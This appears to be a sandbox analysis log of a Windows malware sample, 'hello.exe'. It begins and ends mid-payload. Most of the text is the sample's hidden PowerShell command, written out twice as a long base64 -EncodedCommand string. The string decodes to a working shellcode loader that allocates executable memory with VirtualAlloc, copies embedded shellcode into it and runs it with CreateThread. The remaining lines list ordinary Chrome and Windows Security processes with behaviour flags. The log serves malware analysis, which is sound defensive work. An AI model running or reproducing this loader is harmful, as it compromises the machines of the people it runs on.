pACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
    3⤵
    PID:5584

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:700

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:7528

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:6816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:7636

C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:8360

C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:6012

C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:8984

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:6340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4A